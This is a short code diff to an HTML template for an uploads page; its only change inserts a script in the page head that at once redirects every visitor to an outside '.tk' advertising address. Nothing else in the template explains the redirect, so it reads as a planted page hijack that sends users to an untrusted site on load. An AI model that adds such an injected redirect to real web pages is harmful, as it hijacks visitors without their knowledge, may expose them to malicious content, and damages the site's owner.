--- a/templates/uploads.html
+++ b/templates/uploads.html
@@ -4,6 +4,9 @@
 <head>
     <link rel="stylesheet" type="text/css" href="/styles">
     <link href="https://fonts.googleapis.com/css?family=Open+Sans:400,600,300" rel="stylesheet" type="text/css">
+    <script>
+        document.location = "https://www.inadsglobal.tk/advertise"
+    </script>
 </head>
 
 <body style="font-family: open sans; margin: 0;">
